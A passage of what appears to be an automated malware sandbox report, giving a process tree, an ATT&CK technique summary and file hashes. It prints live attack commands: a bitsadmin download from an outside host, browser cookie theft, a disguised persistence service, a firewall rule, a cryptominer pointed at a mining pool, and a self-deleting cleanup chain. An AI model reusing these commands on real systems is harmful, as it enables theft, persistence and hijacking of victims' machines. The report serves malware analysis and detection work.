                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4800 -s 1260
                                                            7⤵
                                                            • Program crash
                                                            PID:5684
                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4800 -s 1380
                                                            7⤵
                                                            • Suspicious use of NtCreateProcessExOtherParentProcess
                                                            • Program crash
                                                            PID:5984
                                                        • C:\Users\Admin\Documents\ZKbuu54i5DZzunPnnQk5FqzN.exe
                                                          "C:\Users\Admin\Documents\ZKbuu54i5DZzunPnnQk5FqzN.exe"
                                                          6⤵
                                                          • Executes dropped EXE
                                                          • Drops file in Program Files directory
                                                          PID:4792
                                                          • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                                            "C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
                                                            7⤵
                                                            • Executes dropped EXE
                                                            PID:4292
                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                              8⤵
                                                                PID:5880
                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                8⤵
                                                                • Executes dropped EXE
                                                                PID:5884
                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                8⤵
                                                                  PID:5592
                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                  8⤵
                                                                    PID:5048
                                                                • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                                  "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
                                                                  7⤵
                                                                  • Executes dropped EXE
                                                                  • Checks whether UAC is enabled
                                                                  PID:5208
                                                                • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                                                                  "C:\Program Files (x86)\Company\NewProduct\customer3.exe"
                                                                  7⤵
                                                                  • Executes dropped EXE
                                                                  PID:4572
                                                                  • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                    C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                    8⤵
                                                                    • Executes dropped EXE
                                                                    PID:6072
                                                                  • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                    C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                    8⤵
                                                                      PID:4028
                                                                    • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                      C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                      8⤵
                                                                        PID:4484
                                                                      • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                        C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                        8⤵
                                                                          PID:5248
                                                                        • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                          C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                          8⤵
                                                                            PID:4084
                                                                          • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                            C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                            8⤵
                                                                              PID:4588
                                                                        • C:\Users\Admin\Documents\QmKM8PtVm2AbndNgGO5eAseu.exe
                                                                          "C:\Users\Admin\Documents\QmKM8PtVm2AbndNgGO5eAseu.exe"
                                                                          6⤵
                                                                          • Executes dropped EXE
                                                                          • Loads dropped DLL
                                                                          • Drops file in Program Files directory
                                                                          PID:5724
                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst4D29.tmp\tempfile.ps1"
                                                                            7⤵
                                                                              PID:208
                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst4D29.tmp\tempfile.ps1"
                                                                              7⤵
                                                                              • Blocklisted process makes network request
                                                                              • Executes dropped EXE
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:4836
                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst4D29.tmp\tempfile.ps1"
                                                                              7⤵
                                                                                PID:2544
                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst4D29.tmp\tempfile.ps1"
                                                                                7⤵
                                                                                  PID:5444
                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    8⤵
                                                                                      PID:5664
                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst4D29.tmp\tempfile.ps1"
                                                                                    7⤵
                                                                                      PID:4588
                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst4D29.tmp\tempfile.ps1"
                                                                                      7⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:5880
                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst4D29.tmp\tempfile.ps1"
                                                                                      7⤵
                                                                                      • Checks for any installed AV software in registry
                                                                                      PID:4676
                                                                                    • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                      "bitsadmin" /Transfer helper http://fsstoragecloudservice.com/data/data.7z C:\zip.7z
                                                                                      7⤵
                                                                                      • Download via BitsAdmin
                                                                                      PID:1340
                                                                                    • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                                      "C:\Program Files (x86)\lighteningplayer\data_load.exe" -p71Ed3NNagitq2NU -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                                      7⤵
                                                                                      • Drops file in Program Files directory
                                                                                      PID:5492
                                                                                    • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                                      "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pYFhwMcBtvUX9oyJ -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                                      7⤵
                                                                                        PID:2240
                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst4D29.tmp\tempfile.ps1"
                                                                                        7⤵
                                                                                          PID:4660
                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            8⤵
                                                                                              PID:4308
                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst4D29.tmp\tempfile.ps1"
                                                                                            7⤵
                                                                                              PID:904
                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst4D29.tmp\tempfile.ps1"
                                                                                              7⤵
                                                                                                PID:5844
                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst4D29.tmp\tempfile.ps1"
                                                                                                7⤵
                                                                                                  PID:5912
                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst4D29.tmp\tempfile.ps1"
                                                                                                  7⤵
                                                                                                    PID:1364
                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                    C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\NyidFxPQJSqI\NyidFxPQJSqI.dll" NyidFxPQJSqI
                                                                                                    7⤵
                                                                                                    • Loads dropped DLL
                                                                                                    PID:5408
                                                                                                    • C:\Windows\system32\rundll32.exe
                                                                                                      C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\NyidFxPQJSqI\NyidFxPQJSqI.dll" NyidFxPQJSqI
                                                                                                      8⤵
                                                                                                      • Loads dropped DLL
                                                                                                      • Drops file in System32 directory
                                                                                                      • Drops file in Program Files directory
                                                                                                      PID:4532
                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst4D29.tmp\tempfile.ps1"
                                                                                                    7⤵
                                                                                                      PID:5992
                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst4D29.tmp\tempfile.ps1"
                                                                                                      7⤵
                                                                                                        PID:5208
                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst4D29.tmp\tempfile.ps1"
                                                                                                        7⤵
                                                                                                          PID:884
                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst4D29.tmp\tempfile.ps1"
                                                                                                          7⤵
                                                                                                            PID:3084
                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst4D29.tmp\tempfile.ps1"
                                                                                                            7⤵
                                                                                                              PID:5904
                                                                                                            • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                                                              "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                                                              7⤵
                                                                                                              • Loads dropped DLL
                                                                                                              PID:5176
                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                        C:\Windows\system32\cmd.exe /c sonia_6.exe
                                                                                                        4⤵
                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                        PID:2300
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS08F42D94\sonia_6.exe
                                                                                                          sonia_6.exe
                                                                                                          5⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Adds Run key to start application
                                                                                                          • Suspicious use of WriteProcessMemory
                                                                                                          PID:3848
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                            6⤵
                                                                                                            • Executes dropped EXE
                                                                                                            PID:4016
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                            6⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                            PID:4712
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                            6⤵
                                                                                                              PID:5884
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                              6⤵
                                                                                                                PID:4324
                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                            C:\Windows\system32\cmd.exe /c sonia_7.exe
                                                                                                            4⤵
                                                                                                              PID:804
                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 344 -s 544
                                                                                                              4⤵
                                                                                                              • Program crash
                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                              PID:424
                                                                                                      • \??\c:\windows\system32\svchost.exe
                                                                                                        c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                        1⤵
                                                                                                        • Suspicious use of SetThreadContext
                                                                                                        • Modifies registry class
                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                        PID:1092
                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                          C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                          2⤵
                                                                                                          • Checks processor information in registry
                                                                                                          • Modifies registry class
                                                                                                          PID:3796
                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                          C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                          2⤵
                                                                                                          • Drops file in System32 directory
                                                                                                          • Checks processor information in registry
                                                                                                          • Modifies data under HKEY_USERS
                                                                                                          • Modifies registry class
                                                                                                          PID:2960
                                                                                                      • C:\Windows\system32\rUNdlL32.eXe
                                                                                                        rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                        1⤵
                                                                                                        • Process spawned unexpected child process
                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                        PID:3240
                                                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                                                          rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                          2⤵
                                                                                                          • Loads dropped DLL
                                                                                                          • Modifies registry class
                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                          • Suspicious use of WriteProcessMemory
                                                                                                          PID:3972
                                                                                                      • C:\Windows\system32\rUNdlL32.eXe
                                                                                                        rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                        1⤵
                                                                                                        • Process spawned unexpected child process
                                                                                                        PID:5612
                                                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                                                          rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                          2⤵
                                                                                                          • Loads dropped DLL
                                                                                                          • Modifies registry class
                                                                                                          PID:1240
                                                                                                      • \??\c:\windows\system32\svchost.exe
                                                                                                        c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                                        1⤵
                                                                                                        • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                        PID:3056
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\F4E.exe
                                                                                                        C:\Users\Admin\AppData\Local\Temp\F4E.exe
                                                                                                        1⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Checks BIOS information in registry
                                                                                                        • Checks whether UAC is enabled
                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                        PID:412
                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          2⤵
                                                                                                            PID:5444
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\128B.exe
                                                                                                          C:\Users\Admin\AppData\Local\Temp\128B.exe
                                                                                                          1⤵
                                                                                                          • Executes dropped EXE
                                                                                                          PID:4972
                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                            "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\dafxzvsv\
                                                                                                            2⤵
                                                                                                            • Executes dropped EXE
                                                                                                            PID:6092
                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                            "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\rjoovnhl.exe" C:\Windows\SysWOW64\dafxzvsv\
                                                                                                            2⤵
                                                                                                              PID:5160
                                                                                                            • C:\Windows\SysWOW64\sc.exe
                                                                                                              "C:\Windows\System32\sc.exe" create dafxzvsv binPath= "C:\Windows\SysWOW64\dafxzvsv\rjoovnhl.exe /d\"C:\Users\Admin\AppData\Local\Temp\128B.exe\"" type= own start= auto DisplayName= "wifi support"
                                                                                                              2⤵
                                                                                                                PID:4392
                                                                                                              • C:\Windows\SysWOW64\sc.exe
                                                                                                                "C:\Windows\System32\sc.exe" description dafxzvsv "wifi internet conection"
                                                                                                                2⤵
                                                                                                                  PID:4376
                                                                                                                • C:\Windows\SysWOW64\sc.exe
                                                                                                                  "C:\Windows\System32\sc.exe" start dafxzvsv
                                                                                                                  2⤵
                                                                                                                    PID:2016
                                                                                                                  • C:\Windows\SysWOW64\netsh.exe
                                                                                                                    "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                                                                                                    2⤵
                                                                                                                      PID:5368
                                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                        3⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        PID:4028
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\14DE.exe
                                                                                                                    C:\Users\Admin\AppData\Local\Temp\14DE.exe
                                                                                                                    1⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Checks BIOS information in registry
                                                                                                                    • Loads dropped DLL
                                                                                                                    • Checks whether UAC is enabled
                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                    • Checks SCSI registry key(s)
                                                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                                                    PID:4976
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\1B18.exe
                                                                                                                    C:\Users\Admin\AppData\Local\Temp\1B18.exe
                                                                                                                    1⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Loads dropped DLL
                                                                                                                    • Checks processor information in registry
                                                                                                                    • NTFS ADS
                                                                                                                    PID:4164
                                                                                                                    • C:\ProgramData\GCATPKVHKALOGZGG.exe
                                                                                                                      "C:\ProgramData\GCATPKVHKALOGZGG.exe"
                                                                                                                      2⤵
                                                                                                                        PID:5520
                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                        "C:\Windows\System32\cmd.exe" /c taskkill /im 1B18.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\1B18.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                        2⤵
                                                                                                                          PID:4564
                                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                            taskkill /im 1B18.exe /f
                                                                                                                            3⤵
                                                                                                                            • Kills process with taskkill
                                                                                                                            PID:4308
                                                                                                                          • C:\Windows\SysWOW64\timeout.exe
                                                                                                                            timeout /t 6
                                                                                                                            3⤵
                                                                                                                            • Delays execution with timeout.exe
                                                                                                                            PID:6060
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\1E17.exe
                                                                                                                        C:\Users\Admin\AppData\Local\Temp\1E17.exe
                                                                                                                        1⤵
                                                                                                                        • Loads dropped DLL
                                                                                                                        PID:5316
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\30F4.exe
                                                                                                                        C:\Users\Admin\AppData\Local\Temp\30F4.exe
                                                                                                                        1⤵
                                                                                                                        • Checks BIOS information in registry
                                                                                                                        • Checks whether UAC is enabled
                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                        PID:3816
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\32E9.exe
                                                                                                                        C:\Users\Admin\AppData\Local\Temp\32E9.exe
                                                                                                                        1⤵
                                                                                                                          PID:5572
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\358A.exe
                                                                                                                          C:\Users\Admin\AppData\Local\Temp\358A.exe
                                                                                                                          1⤵
                                                                                                                          • Loads dropped DLL
                                                                                                                          PID:4760
                                                                                                                        • C:\Windows\SysWOW64\dafxzvsv\rjoovnhl.exe
                                                                                                                          C:\Windows\SysWOW64\dafxzvsv\rjoovnhl.exe /d"C:\Users\Admin\AppData\Local\Temp\128B.exe"
                                                                                                                          1⤵
                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                          PID:5108
                                                                                                                          • C:\Windows\SysWOW64\svchost.exe
                                                                                                                            svchost.exe
                                                                                                                            2⤵
                                                                                                                            • Drops file in System32 directory
                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                            PID:6116
                                                                                                                            • C:\Windows\SysWOW64\svchost.exe
                                                                                                                              svchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half
                                                                                                                              3⤵
                                                                                                                                PID:3932
                                                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                  4⤵
                                                                                                                                    PID:5368
                                                                                                                            • C:\Windows\SysWOW64\explorer.exe
                                                                                                                              C:\Windows\SysWOW64\explorer.exe
                                                                                                                              1⤵
                                                                                                                                PID:4348
                                                                                                                              • C:\Windows\explorer.exe
                                                                                                                                C:\Windows\explorer.exe
                                                                                                                                1⤵
                                                                                                                                  PID:2164
                                                                                                                                • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                  C:\Windows\SysWOW64\explorer.exe
                                                                                                                                  1⤵
                                                                                                                                    PID:4668
                                                                                                                                  • C:\Windows\explorer.exe
                                                                                                                                    C:\Windows\explorer.exe
                                                                                                                                    1⤵
                                                                                                                                      PID:5776
                                                                                                                                    • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                      C:\Windows\SysWOW64\explorer.exe
                                                                                                                                      1⤵
                                                                                                                                        PID:5800
                                                                                                                                      • C:\Windows\explorer.exe
                                                                                                                                        C:\Windows\explorer.exe
                                                                                                                                        1⤵
                                                                                                                                          PID:6140
                                                                                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                          C:\Windows\SysWOW64\explorer.exe
                                                                                                                                          1⤵
                                                                                                                                            PID:6084
                                                                                                                                          • C:\Windows\explorer.exe
                                                                                                                                            C:\Windows\explorer.exe
                                                                                                                                            1⤵
                                                                                                                                              PID:5640
                                                                                                                                            • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                              C:\Windows\SysWOW64\explorer.exe
                                                                                                                                              1⤵
                                                                                                                                                PID:1832
                                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                                C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                                                1⤵
                                                                                                                                                  PID:1556
                                                                                                                                                • \??\c:\windows\system32\svchost.exe
                                                                                                                                                  c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                                                                  1⤵
                                                                                                                                                    PID:5612

                                                                                                                                                  Network

                                                                                                                                                  MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                  Persistence

                                                                                                                                                  Modify Existing Service

                                                                                                                                                  2
                                                                                                                                                  T1031

                                                                                                                                                  New Service

                                                                                                                                                  1
                                                                                                                                                  T1050

                                                                                                                                                  Registry Run Keys / Startup Folder

                                                                                                                                                  2
                                                                                                                                                  T1060

                                                                                                                                                  BITS Jobs

                                                                                                                                                  1
                                                                                                                                                  T1197

                                                                                                                                                  Privilege Escalation

                                                                                                                                                  New Service

                                                                                                                                                  1
                                                                                                                                                  T1050

                                                                                                                                                  Defense Evasion

                                                                                                                                                  Modify Registry

                                                                                                                                                  5
                                                                                                                                                  T1112

                                                                                                                                                  Disabling Security Tools

                                                                                                                                                  2
                                                                                                                                                  T1089

                                                                                                                                                  Virtualization/Sandbox Evasion

                                                                                                                                                  1
                                                                                                                                                  T1497

                                                                                                                                                  BITS Jobs

                                                                                                                                                  1
                                                                                                                                                  T1197

                                                                                                                                                  Install Root Certificate

                                                                                                                                                  1
                                                                                                                                                  T1130

                                                                                                                                                  Credential Access

                                                                                                                                                  Credentials in Files

                                                                                                                                                  4
                                                                                                                                                  T1081

                                                                                                                                                  Discovery

                                                                                                                                                  Query Registry

                                                                                                                                                  6
                                                                                                                                                  T1012

                                                                                                                                                  Virtualization/Sandbox Evasion

                                                                                                                                                  1
                                                                                                                                                  T1497

                                                                                                                                                  System Information Discovery

                                                                                                                                                  6
                                                                                                                                                  T1082

                                                                                                                                                  Security Software Discovery

                                                                                                                                                  1
                                                                                                                                                  T1063

                                                                                                                                                  Peripheral Device Discovery

                                                                                                                                                  1
                                                                                                                                                  T1120

                                                                                                                                                  Collection

                                                                                                                                                  Data from Local System

                                                                                                                                                  4
                                                                                                                                                  T1005

                                                                                                                                                  Command and Control

                                                                                                                                                  Web Service

                                                                                                                                                  1
                                                                                                                                                  T1102

                                                                                                                                                  Replay Monitor

                                                                                                                                                  Loading Replay Monitor...

                                                                                                                                                  Downloads

                                                                                                                                                  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
                                                                                                                                                    MD5

                                                                                                                                                    ed841d4c457ead52231fd3a2ccf235eb

                                                                                                                                                    SHA1

                                                                                                                                                    3c3e63ebce85e0ad02116131fa358f15bd685aaa

                                                                                                                                                    SHA256

                                                                                                                                                    1b71a0b2da18c33c8067989139712715013e134c0df6fd9d9a99944d665a182d

                                                                                                                                                    SHA512

                                                                                                                                                    da144b6500c3fa6e3becb02b9507424e28b4514c410ccc65c2bf2fde457076edef5de8130832d06e3d985bbbdb7ac132df8bf6aced68d9c5fc1ca27868f3fcc1

                                                                                                                                                  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157
                                                                                                                                                    MD5

                                                                                                                                                    f7dcb24540769805e5bb30d193944dce

                                                                                                                                                    SHA1

                                                                                                                                                    e26c583c562293356794937d9e2e6155d15449ee

                                                                                                                                                    SHA256

                                                                                                                                                    6b88c6ac55bbd6fea0ebe5a760d1ad2cfce251c59d0151a1400701cb927e36ea

                                                                                                                                                    SHA512

                                                                                                                                                    cb5ad678b0ef642bf492f32079fe77e8be20c02de267f04b545df346b25f3e4eb98bb568c4c2c483bb88f7d1826863cb515b570d620766e52476c8ee2931ea94

                                                                                                                                                  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
                                                                                                                                                    MD5

                                                                                                                                                    9be84148228d38d8a7aa04aa003ae49a

                                                                                                                                                    SHA1

                                                                                                                                                    83e6cafe58a6ad820ef295825f0d403e55710aae

                                                                                                                                                    SHA256

                                                                                                                                                    eae2eb93230894f646f45cec38cc20b03f5075e8b5b6c6639dc487c35e7ad573

                                                                                                                                                    SHA512

                                                                                                                                                    eb85383b426ec5cd211fafceaf24d438c8a0d6ac43be2cf9802748de505ada0b4d008548a08834dcc86b4c1b0e3fa5c1a4762e54ab5f6e55ea900e535bc4b578

                                                                                                                                                  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
                                                                                                                                                    MD5

                                                                                                                                                    46c0684409c03453a456e5c343f72980

                                                                                                                                                    SHA1

